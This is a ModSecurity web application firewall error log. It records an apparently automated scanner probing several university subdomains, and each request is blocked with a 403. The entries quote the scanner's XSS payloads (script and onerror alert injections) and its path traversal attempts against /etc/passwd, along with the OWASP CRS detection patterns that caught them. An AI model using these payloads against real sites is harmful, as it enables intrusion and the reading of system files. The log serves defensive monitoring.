[Tue Aug 29 11:56:37.636711 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: 16170297</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16hcCo-f0AAAq@snQAAAAM"]
[Tue Aug 29 11:56:37.643038 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: 16170297</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16hcCo-f0AAAq3bAoAAAAI"]
[Tue Aug 29 11:56:37.664158 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/home/get_products"] [unique_id "ZO16hcCo-f0AAAqeFrMAAAAx"]
[Tue Aug 29 11:56:37.665044 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:class: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16hcCo-f0AAAq@snUAAAAM"]
[Tue Aug 29 11:56:38.719518 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: 16170297</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16hsCo-f0AAAq3bA4AAAAI"]
[Tue Aug 29 11:56:38.820848 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: 16170297</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16hsCo-f0AAAocylYAAAAR"]
[Tue Aug 29 11:56:39.531123 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:user: j\\x22;-alert(1)-\\x22x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/global-protect/login.esp"] [unique_id "ZO16h8Co-f0AAAoz8L8AAAAS"]
[Tue Aug 29 11:56:39.595606 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:indexFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:indexFile: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16h8Co-f0AAArIAVwAAAAX"]
[Tue Aug 29 11:56:39.617506 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?(x?or|div|like|between|and)\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]?\\\\d)|(?:\\\\\\\\x(?:23|27|3d))|(?:^.?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]$)|(?:(?:^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\\\\\]*?(?:[\\\\ ..." at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "237"] [id "981242"] [msg "Detects classic SQL injection probings 1/2"] [data "Matched Data: (1)-\\x22x found within ARGS:user: j\\x22;-alert(1)-\\x22x"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "informatika.unla.ac.id"] [uri "/global-protect/login.esp"] [unique_id "ZO16h8Co-f0AAArIAV0AAAAX"]
[Tue Aug 29 11:56:39.627231 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:user: j\\x22;-alert(1)-\\x22x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/global-protect/login.esp"] [unique_id "ZO16h8Co-f0AAAq-HdQAAAAT"]
[Tue Aug 29 11:56:39.652017 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?(x?or|div|like|between|and)\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]?\\\\d)|(?:\\\\\\\\x(?:23|27|3d))|(?:^.?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]$)|(?:(?:^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\\\\\]*?(?:[\\\\ ..." at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "237"] [id "981242"] [msg "Detects classic SQL injection probings 1/2"] [data "Matched Data: (1)-\\x22x found within ARGS:user: j\\x22;-alert(1)-\\x22x"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "ft.unla.ac.id"] [uri "/global-protect/login.esp"] [unique_id "ZO16h8Co-f0AAArZPx4AAAAC"]
[Tue Aug 29 11:56:39.692998 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:indexFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:indexFile: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16h8Co-f0AAArZPyAAAAAC"]
[Tue Aug 29 11:56:39.700020 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:searchdata. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:searchdata: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/search-request.php"] [unique_id "ZO16h8Co-f0AAArIAWEAAAAX"]
[Tue Aug 29 11:56:39.727918 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:searchdata. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:searchdata: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/search-request.php"] [unique_id "ZO16h8Co-f0AAAq-HdkAAAAT"]
[Tue Aug 29 11:56:39.730424 2023] [:error] [pid 2736] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:searchdata. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:searchdata: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/search-request.php"] [unique_id "ZO16h8Co-f0AAAqw53EAAAAH"]
[Tue Aug 29 11:56:39.732686 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?(x?or|div|like|between|and)\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]?\\\\d)|(?:\\\\\\\\x(?:23|27|3d))|(?:^.?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]$)|(?:(?:^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\\\\\]*?(?:[\\\\ ..." at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "237"] [id "981242"] [msg "Detects classic SQL injection probings 1/2"] [data "Matched Data: (1)-\\x22x found within ARGS:user: j\\x22;-alert(1)-\\x22x"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/global-protect/login.esp"] [unique_id "ZO16h8Co-f0AAArZPyIAAAAC"]
[Tue Aug 29 11:56:39.816756 2023] [:error] [pid 2736] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:searchdata. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:searchdata: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/search-request.php"] [unique_id "ZO16h8Co-f0AAAqw53UAAAAH"]
[Tue Aug 29 11:56:39.877261 2023] [:error] [pid 2736] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:searchdata. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:searchdata: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/search-request.php"] [unique_id "ZO16h8Co-f0AAAqw53gAAAAH"]
[Tue Aug 29 11:56:39.899281 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:indexFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:indexFile: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16h8Co-f0AAArIAWoAAAAX"]
[Tue Aug 29 11:56:39.919728 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:indexFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:indexFile: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16h8Co-f0AAArIAWsAAAAX"]
[Tue Aug 29 11:56:39.939385 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:indexFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:indexFile: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16h8Co-f0AAAq-HeMAAAAT"]
[Tue Aug 29 11:56:40.535237 2023] [:error] [pid 2736] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:viewit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:viewit: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16iMCo-f0AAAqw53wAAAAH"]
[Tue Aug 29 11:56:40.540567 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:viewit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:viewit: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16iMCo-f0AAAq5@TIAAAAK"]
[Tue Aug 29 11:56:40.763098 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:viewit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:viewit: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16iMCo-f0AAAq5@TMAAAAK"]
[Tue Aug 29 11:56:40.767777 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16iMCo-f0AAAocyloAAAAR"]
[Tue Aug 29 11:56:40.819741 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16iMCo-f0AAAoz8MQAAAAS"]
[Tue Aug 29 11:56:40.825045 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16iMCo-f0AAAq-HeUAAAAT"]
[Tue Aug 29 11:56:40.830915 2023] [:error] [pid 2736] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16iMCo-f0AAAqw530AAAAH"]
[Tue Aug 29 11:56:40.837489 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:viewit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:viewit: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16iMCo-f0AAAq5@TUAAAAK"]
[Tue Aug 29 11:56:40.862795 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:viewit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:viewit: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16iMCo-f0AAAoz8MYAAAAS"]
